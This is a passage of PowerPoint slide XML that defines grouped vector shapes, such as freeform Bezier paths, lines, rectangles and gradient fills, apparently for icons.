                        <a:gd name="T5" fmla="*/ 241 h 24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898" h="241">
                          <a:moveTo>
                            <a:pt x="898" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="898" y="24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5" name="Line 565"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="945" y="3637"/>
                      <a:ext cx="898" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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6" name="Freeform 56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95" y="3866"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 895 w 895"/>
                        <a:gd name="T1" fmla="*/ 241 h 241"/>
                        <a:gd name="T2" fmla="*/ 0 w 895"/>
                        <a:gd name="T3" fmla="*/ 0 h 241"/>
                        <a:gd name="T4" fmla="*/ 895 w 895"/>
                        <a:gd name="T5" fmla="*/ 241 h 24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895" h="241">
                          <a:moveTo>
                            <a:pt x="895" y="241"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="895" y="24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7" name="Line 567"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeShapeType="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm flipH="1" flipV="1">
                      <a:off x="95" y="3866"/>
                      <a:ext cx="895" cy="241"/>
                    </a:xfrm>
                    <a:prstGeom prst="line">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="6350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44" name="Group 568"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="602" y="1782"/>
                <a:ext cx="204" cy="325"/>
                <a:chOff x="2427" y="3211"/>
                <a:chExt cx="318" cy="506"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="245" name="Group 569"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2427" y="3211"/>
                  <a:ext cx="187" cy="187"/>
                  <a:chOff x="-13057" y="18860"/>
                  <a:chExt cx="331" cy="331"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="252" name="Rectangle 570"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-13057" y="18860"/>
                    <a:ext cx="331" cy="331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1B171B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3" name="Freeform 571"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="-13005" y="18922"/>
                    <a:ext cx="227" cy="205"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 44 w 96"/>
                      <a:gd name="T1" fmla="*/ 61 h 87"/>
                      <a:gd name="T2" fmla="*/ 42 w 96"/>
                      <a:gd name="T3" fmla="*/ 64 h 87"/>
                      <a:gd name="T4" fmla="*/ 15 w 96"/>
                      <a:gd name="T5" fmla="*/ 87 h 87"/>
                      <a:gd name="T6" fmla="*/ 0 w 96"/>
                      <a:gd name="T7" fmla="*/ 75 h 87"/>
                      <a:gd name="T8" fmla="*/ 4 w 96"/>
                      <a:gd name="T9" fmla="*/ 75 h 87"/>
                      <a:gd name="T10" fmla="*/ 32 w 96"/>
                      <a:gd name="T11" fmla="*/ 56 h 87"/>
                      <a:gd name="T12" fmla="*/ 35 w 96"/>
                      <a:gd name="T13" fmla="*/ 50 h 87"/>
                      <a:gd name="T14" fmla="*/ 33 w 96"/>
                      <a:gd name="T15" fmla="*/ 47 h 87"/>
                      <a:gd name="T16" fmla="*/ 14 w 96"/>
                      <a:gd name="T17" fmla="*/ 16 h 87"/>
                      <a:gd name="T18" fmla="*/ 24 w 96"/>
                      <a:gd name="T19" fmla="*/ 0 h 87"/>
                      <a:gd name="T20" fmla="*/ 42 w 96"/>
                      <a:gd name="T21" fmla="*/ 37 h 87"/>
                      <a:gd name="T22" fmla="*/ 44 w 96"/>
                      <a:gd name="T23" fmla="*/ 40 h 87"/>
                      <a:gd name="T24" fmla="*/ 48 w 96"/>
                      <a:gd name="T25" fmla="*/ 34 h 87"/>
                      <a:gd name="T26" fmla="*/ 78 w 96"/>
                      <a:gd name="T27" fmla="*/ 11 h 87"/>
                      <a:gd name="T28" fmla="*/ 88 w 96"/>
                      <a:gd name="T29" fmla="*/ 16 h 87"/>
                      <a:gd name="T30" fmla="*/ 90 w 96"/>
                      <a:gd name="T31" fmla="*/ 19 h 87"/>
                      <a:gd name="T32" fmla="*/ 57 w 96"/>
                      <a:gd name="T33" fmla="*/ 45 h 87"/>
                      <a:gd name="T34" fmla="*/ 54 w 96"/>
                      <a:gd name="T35" fmla="*/ 50 h 87"/>
                      <a:gd name="T36" fmla="*/ 56 w 96"/>
                      <a:gd name="T37" fmla="*/ 53 h 87"/>
                      <a:gd name="T38" fmla="*/ 88 w 96"/>
                      <a:gd name="T39" fmla="*/ 72 h 87"/>
                      <a:gd name="T40" fmla="*/ 96 w 96"/>
                      <a:gd name="T41" fmla="*/ 70 h 87"/>
                      <a:gd name="T42" fmla="*/ 88 w 96"/>
                      <a:gd name="T43" fmla="*/ 83 h 87"/>
                      <a:gd name="T44" fmla="*/ 79 w 96"/>
                      <a:gd name="T45" fmla="*/ 86 h 87"/>
                      <a:gd name="T46" fmla="*/ 48 w 96"/>
                      <a:gd name="T47" fmla="*/ 66 h 87"/>
                      <a:gd name="T48" fmla="*/ 44 w 96"/>
                      <a:gd name="T49" fmla="*/ 61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6" h="87">
                        <a:moveTo>
                          <a:pt x="44" y="61"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="64"/>
                          <a:pt x="42" y="64"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="30" y="79"/>
                          <a:pt x="21" y="87"/>
                          <a:pt x="15" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="10" y="87"/>
                          <a:pt x="5" y="83"/>
                          <a:pt x="0" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="75"/>
                          <a:pt x="3" y="75"/>
                          <a:pt x="4" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="12" y="75"/>
                          <a:pt x="21" y="69"/>
                          <a:pt x="32" y="56"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="35" y="50"/>
                          <a:pt x="35" y="50"/>
                          <a:pt x="35" y="50"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="33" y="47"/>
                          <a:pt x="33" y="47"/>
                          <a:pt x="33" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="21" y="32"/>
                          <a:pt x="14" y="22"/>
                          <a:pt x="14" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="12"/>
                          <a:pt x="17" y="7"/>
                          <a:pt x="24" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="27" y="13"/>
                          <a:pt x="33" y="25"/>
                          <a:pt x="42" y="37"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="40"/>
                          <a:pt x="44" y="40"/>
                          <a:pt x="44" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="48" y="34"/>
                          <a:pt x="48" y="34"/>
                          <a:pt x="48" y="34"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="61" y="18"/>
                          <a:pt x="71" y="11"/>
                          <a:pt x="78" y="11"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="82" y="11"/>
                          <a:pt x="85" y="13"/>
                          <a:pt x="88" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="88" y="17"/>
                          <a:pt x="89" y="18"/>
                          <a:pt x="90" y="19"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="24"/>
                          <a:pt x="69" y="32"/>
                          <a:pt x="57" y="45"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="50"/>
                          <a:pt x="54" y="50"/>
                          <a:pt x="54" y="50"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="56" y="53"/>
                          <a:pt x="56" y="53"/>
                          <a:pt x="56" y="53"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="68" y="65"/>
                          <a:pt x="78" y="72"/>
                          <a:pt x="88" y="72"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="72"/>
                          <a:pt x="93" y="71"/>
                          <a:pt x="96" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="77"/>
                          <a:pt x="90" y="81"/>
                          <a:pt x="88" y="83"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="86"/>
                          <a:pt x="83" y="86"/>
                          <a:pt x="79" y="86"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="71" y="86"/>
                          <a:pt x="61" y="79"/>
                          <a:pt x="48" y="66"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="44" y="61"/>
                          <a:pt x="44" y="61"/>
                          <a:pt x="44" y="6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46" name="Group 572"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2427" y="3398"/>
                  <a:ext cx="318" cy="319"/>
                  <a:chOff x="2588" y="3409"/>
                  <a:chExt cx="318" cy="319"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="247" name="Rectangle 573"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2866" y="3688"/>
                    <a:ext cx="40" cy="4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8" name="Rectangle 574"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2785" y="3607"/>
                    <a:ext cx="71" cy="71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49" name="Group 575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588" y="3409"/>
                    <a:ext cx="187" cy="187"/>
                    <a:chOff x="-12610" y="19344"/>
                    <a:chExt cx="330" cy="331"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="250" name="Rectangle 576"/>
                    <p:cNvSpPr>
                      <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </p:cNvSpPr>
                    <p:nvPr/>
                  </p:nvSpPr>
                  <p:spPr bwMode="gray">
                    <a:xfrm>
                      <a:off x="-12610" y="19344"/>
                      <a:ext cx="330" cy="331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6350">
                      <a:solidFill>
                        <a:srgbClr val="1B171B"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln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51" name="Freeform 577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-12584" y="19420"/>
                      <a:ext cx="281" cy="179"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 112 w 119"/>
                        <a:gd name="T1" fmla="*/ 17 h 76"/>
                        <a:gd name="T2" fmla="*/ 104 w 119"/>
                        <a:gd name="T3" fmla="*/ 15 h 76"/>
                        <a:gd name="T4" fmla="*/ 105 w 119"/>
                        <a:gd name="T5" fmla="*/ 7 h 76"/>
                        <a:gd name="T6" fmla="*/ 110 w 119"/>
                        <a:gd name="T7" fmla="*/ 2 h 76"/>
                        <a:gd name="T8" fmla="*/ 101 w 119"/>
                        <a:gd name="T9" fmla="*/ 3 h 76"/>
                        <a:gd name="T10" fmla="*/ 93 w 119"/>
                        <a:gd name="T11" fmla="*/ 12 h 76"/>
                        <a:gd name="T12" fmla="*/ 87 w 119"/>
                        <a:gd name="T13" fmla="*/ 19 h 76"/>
                        <a:gd name="T14" fmla="*/ 83 w 119"/>
                        <a:gd name="T15" fmla="*/ 20 h 76"/>
                        <a:gd name="T16" fmla="*/ 26 w 119"/>
                        <a:gd name="T17" fmla="*/ 48 h 76"/>
                        <a:gd name="T18" fmla="*/ 16 w 119"/>
                        <a:gd name="T19" fmla="*/ 47 h 76"/>
                        <a:gd name="T20" fmla="*/ 6 w 119"/>
                        <a:gd name="T21" fmla="*/ 50 h 76"/>
                        <a:gd name="T22" fmla="*/ 0 w 119"/>
                        <a:gd name="T23" fmla="*/ 64 h 76"/>
                        <a:gd name="T24" fmla="*/ 7 w 119"/>
                        <a:gd name="T25" fmla="*/ 57 h 76"/>
                        <a:gd name="T26" fmla="*/ 17 w 119"/>
                        <a:gd name="T27" fmla="*/ 59 h 76"/>
                        <a:gd name="T28" fmla="*/ 15 w 119"/>
                        <a:gd name="T29" fmla="*/ 68 h 76"/>
                        <a:gd name="T30" fmla="*/ 9 w 119"/>
                        <a:gd name="T31" fmla="*/ 74 h 76"/>
                        <a:gd name="T32" fmla="*/ 20 w 119"/>
                        <a:gd name="T33" fmla="*/ 73 h 76"/>
                        <a:gd name="T34" fmla="*/ 29 w 119"/>
                        <a:gd name="T35" fmla="*/ 62 h 76"/>
                        <a:gd name="T36" fmla="*/ 36 w 119"/>
                        <a:gd name="T37" fmla="*/ 55 h 76"/>
                        <a:gd name="T38" fmla="*/ 95 w 119"/>
                        <a:gd name="T39" fmla="*/ 24 h 76"/>
                        <a:gd name="T40" fmla="*/ 105 w 119"/>
                        <a:gd name="T41" fmla="*/ 25 h 76"/>
                        <a:gd name="T42" fmla="*/ 114 w 119"/>
                        <a:gd name="T43" fmla="*/ 23 h 76"/>
                        <a:gd name="T44" fmla="*/ 119 w 119"/>
                        <a:gd name="T45" fmla="*/ 11 h 76"/>
                        <a:gd name="T46" fmla="*/ 112 w 119"/>
                        <a:gd name="T47" fmla="*/ 17 h 7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</a:cxnLst>
                      <a:rect l="0" t="0" r="r" b="b"/>
                      <a:pathLst>
                        <a:path w="119" h="76">
                          <a:moveTo>
                            <a:pt x="112" y="17"/>
                          </a:moveTo>
                          <a:cubicBezTo>
                            <a:pt x="111" y="18"/>
                            <a:pt x="107" y="19"/>
                            <a:pt x="104" y="15"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="101" y="10"/>
                            <a:pt x="104" y="7"/>
                            <a:pt x="105" y="7"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="106" y="6"/>
                            <a:pt x="110" y="2"/>
                            <a:pt x="110" y="2"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="111" y="1"/>
                            <a:pt x="107" y="0"/>
                            <a:pt x="101" y="3"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="95" y="5"/>
                            <a:pt x="94" y="9"/>
                            <a:pt x="93" y="12"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="92" y="16"/>
                            <a:pt x="88" y="18"/>
                            <a:pt x="87" y="19"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="87" y="19"/>
                            <a:pt x="86" y="19"/>
                            <a:pt x="83" y="20"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="26" y="48"/>
                            <a:pt x="26" y="48"/>
                            <a:pt x="26" y="48"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="26" y="48"/>
                            <a:pt x="23" y="50"/>
                            <a:pt x="16" y="47"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="16" y="47"/>
                            <a:pt x="11" y="45"/>
                            <a:pt x="6" y="50"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="1" y="54"/>
                            <a:pt x="0" y="61"/>
                            <a:pt x="0" y="64"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="0" y="66"/>
                            <a:pt x="6" y="59"/>
                            <a:pt x="7" y="57"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="9" y="56"/>
                            <a:pt x="14" y="54"/>
                            <a:pt x="17" y="59"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="20" y="65"/>
                            <a:pt x="16" y="68"/>
                            <a:pt x="15" y="68"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="15" y="69"/>
                            <a:pt x="10" y="73"/>
                            <a:pt x="9" y="74"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="9" y="75"/>
                            <a:pt x="14" y="76"/>
                            <a:pt x="20" y="73"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="27" y="70"/>
                            <a:pt x="28" y="66"/>
                            <a:pt x="29" y="62"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="30" y="58"/>
                            <a:pt x="35" y="55"/>
                            <a:pt x="36" y="55"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="37" y="54"/>
                            <a:pt x="95" y="24"/>
                            <a:pt x="95" y="24"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="95" y="24"/>
                            <a:pt x="98" y="23"/>
                            <a:pt x="105" y="25"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="105" y="25"/>
                            <a:pt x="109" y="27"/>
                            <a:pt x="114" y="23"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="118" y="19"/>
                            <a:pt x="119" y="13"/>
                            <a:pt x="119" y="11"/>
                          </a:cubicBezTo>
                          <a:cubicBezTo>
                            <a:pt x="119" y="9"/>
                            <a:pt x="114" y="15"/>
                            <a:pt x="112" y="17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6350" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="1B161B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353" name="Group 906"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7113163" y="2250374"/>
              <a:ext cx="1612019" cy="494369"/>
              <a:chOff x="3208" y="2433"/>
              <a:chExt cx="1288" cy="395"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="354" name="Freeform 579"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3208" y="2482"/>
                <a:ext cx="1288" cy="346"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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355" name="Group 580"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3740" y="2445"/>
                <a:ext cx="88" cy="210"/>
                <a:chOff x="2022" y="2429"/>
                <a:chExt cx="266" cy="637"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="415" name="Freeform 581"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2100" y="2737"/>
                  <a:ext cx="121" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 90 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 3 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 44 w 90"/>
                    <a:gd name="T17" fmla="*/ 204 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 39 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 44 w 90"/>
                    <a:gd name="T25" fmla="*/ 204 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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  <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="170"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="46"/>
                        <a:pt x="36" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="46"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="170"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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ED563"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:srgbClr val="FED563">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FED563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16" name="Freeform 582"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2022" y="2517"/>
                  <a:ext cx="266" cy="310"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
